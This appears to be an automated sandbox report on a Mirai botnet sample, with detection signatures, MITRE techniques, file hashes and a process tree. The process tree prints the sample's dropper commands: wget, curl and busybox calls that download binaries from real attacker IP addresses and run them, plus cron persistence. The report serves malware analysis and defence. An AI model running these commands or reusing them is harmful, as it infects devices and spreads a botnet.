mirai | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1

Analysis

max time kernel
149s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
02/09/2024, 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Size

8KB
MD5

86311599eaaff9e71ddc72ada1b21c2e
SHA1

572f97e41071d072dfc97127454d4978b50a81e2
SHA256

85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1
SHA512

74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317
SSDEEP

96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7

Score

10^/10

mirai antivm botnet discovery persistence

Malware Config

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Contacts a large (43741) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Executes dropped EXE 2 IoCs

ioc	pid	Process
/bin/feankzzyx	679	feankzzyx
/bin/feankzzyx	687	feankzzyx

Creates/modifies Cron job 1 TTPs 3 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/root	feankzzyx
File opened for modification	/var/spool/cron/crontabs/tmp.sjxuuT	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.pEeG78	crontab

Writes file to system bin folder 1 TTPs 54 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/allah_is_satan	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/bwivxypyjz	feankzzyx
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/current_user2	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/ALLAH_IS_EVIL.txt	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/fgxurlbg	feankzzyx
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	curl
File opened for modification	/bin/feankzzyx	85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification	/bin/firmware_v4?user=root&dir=%2Fbin	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	wget
File opened for modification	/bin/feankzzyx	busybox
File opened for modification	/bin/feankzzyx	busybox

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	et	687	feankzzyx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 35 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/kernel/ngroups_max	id
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/allah_is_prick.html	feankzzyx

/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
1⤵
- Writes file to system bin folder
PID:645
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:651
- /bin/sed
  sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
  2⤵
  - Reads runtime system information
  PID:652
- /usr/bin/whoami
  whoami
  2⤵
  PID:657
- /usr/bin/wget
  wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
  2⤵
  - Writes file to system bin folder
  PID:660
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:668
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:677
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  PID:679
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:683
- /bin/chmod
  chmod 0755 ./feankzzyx
  2⤵
  PID:686
- /bin/feankzzyx
  ./feankzzyx
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Writes file to system bin folder
  - Changes its process name
  - Writes file to tmp directory
  PID:687
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:700
  - - /bin/hostname
      hostname -I
      4⤵
      PID:707
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:701
  - - /bin/hostname
      hostname -I
      4⤵
      PID:705
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:703
  - - /bin/hostname
      hostname -I
      4⤵
      PID:708
- - /bin/sh
    sh -c "hostname -I"
    3⤵
    PID:704
  - - /bin/hostname
      hostname -I
      4⤵
      PID:709
- - /bin/sh
    sh -c "crontab /var/spool/cron/crontabs/root"
    3⤵
    PID:706
  - - /usr/bin/crontab
      crontab /var/spool/cron/crontabs/root
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:711
- - /bin/sh
    sh -c "crontab /var/spool/cron/crontabs/root"
    3⤵
    PID:710
  - - /usr/bin/crontab
      crontab /var/spool/cron/crontabs/root
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:712
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:689
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:713
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:714
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:715
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:716
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:717
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:720
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.mipsel -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:722
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.powerpc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:724
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sh4 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:727
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.sparc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:730
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:732
- /usr/bin/wget
  wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:734
- /bin/rm
  rm ff0
  2⤵
  PID:737
- /bin/rm
  rm ff1
  2⤵
  PID:738
- /bin/rm
  rm ff2
  2⤵
  PID:739
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.x86_64 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:741
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv4l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:746
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv5l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:752
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv6l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:756
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.armv7l -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:760
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i586 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:766
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.i686 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:783
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.m68k -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:789
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mips -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:792
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.mipsel -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:793
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.powerpc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:794
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sh4 -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:795
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.sparc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:800
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:805
- /usr/bin/curl
  curl http://45.159.211.121/firmware/firmware.arc -o feankzzyx
  2⤵
  - Writes file to system bin folder
  - Checks CPU configuration
  - Reads runtime system information
  PID:810
- /bin/rm
  rm ff0
  2⤵
  PID:815
- /bin/rm
  rm ff1
  2⤵
  PID:820
- /bin/rm
  rm ff2
  2⤵
  PID:822
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:823
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:828
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:830
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:831
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:833
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:835
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:838
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:842
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:846
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.mipsel -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:847
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.powerpc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:848
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.sh4 -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:849
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.sparc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:850
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:851
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:852
- /bin/rm
  rm ff0
  2⤵
  PID:853
- /bin/rm
  rm ff1
  2⤵
  PID:854
- /bin/rm
  rm ff2
  2⤵
  PID:855
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.x86_64 -o feankzzyx
  2⤵
  PID:856
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv4l -o feankzzyx
  2⤵
  PID:857
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv5l -o feankzzyx
  2⤵
  PID:858
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv6l -o feankzzyx
  2⤵
  PID:859
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.armv7l -o feankzzyx
  2⤵
  PID:860
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.i586 -o feankzzyx
  2⤵
  PID:861
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.i686 -o feankzzyx
  2⤵
  PID:862
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.m68k -o feankzzyx
  2⤵
  PID:863
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.mips -o feankzzyx
  2⤵
  PID:864
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.mipsel -o feankzzyx
  2⤵
  PID:865
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.powerpc -o feankzzyx
  2⤵
  PID:866
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.sh4 -o feankzzyx
  2⤵
  PID:867
- /bin/busybox
  busybox curl http://45.159.211.121/firmware/firmware.sparc -o feankzzyx
  2⤵
  PID:868
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arm-linux-gnueabihf -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:869
- /bin/busybox
  busybox wget http://45.159.211.121/firmware/firmware.arc -O feankzzyx
  2⤵
  - Writes file to system bin folder
  PID:870
- /bin/rm
  rm ff0
  2⤵
  PID:871
- /bin/rm
  rm ff1
  2⤵
  PID:872
- /bin/rm
  rm ff2
  2⤵
  PID:873
- /bin/rm
  rm allah_is_satan
  2⤵
  PID:874
- /bin/sleep
  sleep 13
  2⤵
  PID:876
- /bin/busybox
  busybox ftpget 45.159.211.121 allah_is_satan /firmware/firmware.sh
  2⤵
  PID:875
- /bin/sh
  sh ./allah_is_satan
  2⤵
  PID:883

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Defense Evasion

Hijack Execution Flow

T1574

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/bin/ALLAH_IS_EVIL.txt

Filesize
828B

MD5
654d89fdcfd44330b80fc359d544adb9

SHA1
53ff7c283c7bab6b7071510349b7785e54da5454

SHA256
43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

SHA512
d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

Download Submit
/bin/allah_is_satan

Filesize
15B

MD5
640832e65d903e762b84b766ea39ed8e

SHA1
a35a203fbae4b913edbd5f00cfc92fe076e39532

SHA256
68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

SHA512
f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

Download Submit
/bin/current_user2

Filesize
5B

MD5
74cc1c60799e0a786ac7094b532f01b1

SHA1
552c0ba71b1046a083583ebf943cc9aa09f39a32

SHA256
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

SHA512
21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

Download Submit
/bin/feankzzyx

Filesize
10B

MD5
7d91028619a806f35dac54dd9f656276

SHA1
ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e

SHA256
8227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484

SHA512
9a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956

Download Submit
/bin/feankzzyx

Filesize
113KB

MD5
c299a4bdbe4ef9d182cb09757ab90846

SHA1
d782a7013df1dd10b04f05d82ebb754677be77d5

SHA256
0c3ebdc3a06156bc3c22c14dff61e3f71f85651e274372b0ba494edbe5000ecd

SHA512
a057c86107a7c3076a5677b0c926cd5f5d997020d9ddf4638ae769f727391f641fd796f94efc677d9072bdf83d383b53a440dfd822c4c28d399e10499154d4bd

Download Submit
/bin/fgxurlbg

Filesize
109KB

MD5
5791d11575d52a0773716ce215a6c661

SHA1
29d3d9042e1955b7d7619bd8d3edb5ebed00fec6

SHA256
152ce9bf498ae4df1184e78d7570bdbe9d8660e8cb1bb2277cff79b7f6489c31

SHA512
aaadd7989c3dc67a4205020a9342a0ab1642f2518b7683d58dd344b854e0ff7e5030d99da2f54885e71b9f5b3d7b749330345b9ed5938958ce9b1010d71b0c51

Download Submit
/bin/firmware_v4?user=root&dir=%2Fbin

Filesize
4B

MD5
2a76ee31e49f38759ed046466b52a513

SHA1
e31dcb09b650cd3ab532a902888c33da96f45c55

SHA256
7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

SHA512
e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

Download Submit
/etc/d

Filesize
10B

MD5
06edaa26f7c068a8910d455a992ba6a1

SHA1
342eddc2eaf4a376e967e0a5573255493b9e0610

SHA256
759cf8371bfcfcd038e754d782af39e5ced744339a1847561810cbc5cf6678b1

SHA512
d5307a0d4cc04f4deb19cf525e14f9e5165a355a3a6757a8e3fa41a586ae476b2a69433ebb8fe298789a2984e6f488c282610748d9984a738a2e263bbe79dbac

Download Submit
/etc/d

Filesize
20B

MD5
a0a253d46d9df947ddd7b122ffbd26f3

SHA1
99aa1849e708519bf3022251affd7689097c6446

SHA256
29fdd10429a254920b7157493b708bb2996313a705a5b3f023bead84004295ff

SHA512
f504c03be768aa1be8f5bf7c104d3a8a99e7bcd7c76a0e06949a1aac9e25db988be35c42682a6374f54af7873193e11d4a208dee794f0138cd9f6d6f4f9fa721

Download Submit
/etc/d

Filesize
30B

MD5
79f044b2c7e9925a02cadc023d035117

SHA1
7126adac0bf4e008f1aa70ad789789b724ed7f30

SHA256
2c595d4ebdd4d2e8b5aad24112b41d0bf864e20dbbfc8fbb54976519a776ddd4

SHA512
091da84bf4038ab64b5d286d5181df6e4bea73c587889aaca0368af9d86e0aa45e62a24822b4e8adf314616557834b6bd6da777b4f437273b6146955de597a6c

Download Submit
/etc/d

Filesize
50B

MD5
484c35c66b34c90b1f7a446a62610d73

SHA1
35cad7d7a4e9e62367d8870aec7dd88a57334116

SHA256
572d7df547b2dcc96300747b8adcd1d10649c2e1aec82e6ffed6e69bdce95b9b

SHA512
202d7c63dfbf168881588dee74e7c958cbf50570da34c15868d04fbdba96711fce8ed67b98ca307155be88c7d70f22864b312ab867196caf99eaf928bbc5649c

Download Submit
/etc/d

Filesize
60B

MD5
a69f556c324df97534b24a4c8f81a7c0

SHA1
10d4f0c8496116b1f819c551b43df5257db0b2df

SHA256
b238960ad3d37f5e0001225a1cc4d2cc9e3a8fe355e535b2219c77eef3b88521

SHA512
52efe1ba5f1571a9d0bc05cda73e978adb844dcd43686a4c21dccf52935cc14940a9ed707b6116a5800b31844479c86e3910d608e2dae38c686a4e1f9019b823

Download Submit
/tmp/allah_is_prick.html

Filesize
360B

MD5
3a2d9ee3d20a76ed6af3f066be482b64

SHA1
8ee4338df17d6dbbd7cfec1aa0abbd6a7b8081f6

SHA256
9d542210472a30c5142df1f1ac2a25d72a453c5dfad27b09f805691a2e936082

SHA512
715e81e95217eb0d10c1fb3518a589782c2f67bc100e349582cccb5ab5706c4ec931879e3c03717a099d475f8dbec58082cee306c74cd264bd733b5b98aa0b25

Download Submit
/var/spool/cron/crontabs/root

Filesize
26B

MD5
57e6734d71e2bfec257985dd3b52e194

SHA1
5e0fe9fb24518d2ae93e476b41b5cfb3d49bb6f6

SHA256
6f92b6b84f715fe55c2c60f701a3809927387c309a7efcd1538ab84de9f60461

SHA512
426c2b3d2143bea04cf745631e1e2a247437ae14b2f6dcd0b07e5f3b36d5be4fcdf2c2c186fe20a178051ba26df4b29425712f4e7782034836a077ff2a6ce4c5

Download Submit
/var/spool/cron/crontabs/root

Filesize
50B

MD5
9300a3f9c146f06a4a46969234f3631c

SHA1
37166e1aaba5bb1b416bc162b7e37f3259ea365d

SHA256
a8be71e6fe72128d9de4c7800c442f4af6197cb26e89fd1f7d72bcbff054e680

SHA512
5b9101a48ba42c1a60391dfc8eb3c5847180c78a34afcfaa5978183d4beaf47ba487363eb310f12beb835af343e35efbd1474af0c7b862a2ffb68f4ddb6e220a

Download Submit
/var/spool/cron/crontabs/tmp.sjxuuT

Filesize
253B

MD5
e7cf00b6d1927d46d8604a96d53c6c44

SHA1
d7f9a886158c858b49561b0f855e0cd788e71558

SHA256
d70f1b602097c7bb4feb1a13ce2490c8970da621d8a4a88b6aef73c90d4a599c

SHA512
aa37ecbbcb9d36961a0750cf3e08638f9c1fef9142a8c367012397ed2ae4f6435949590ee075925ce1a5f3ea110374987fb5c1be4cee77da271bf02725cefd8c

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads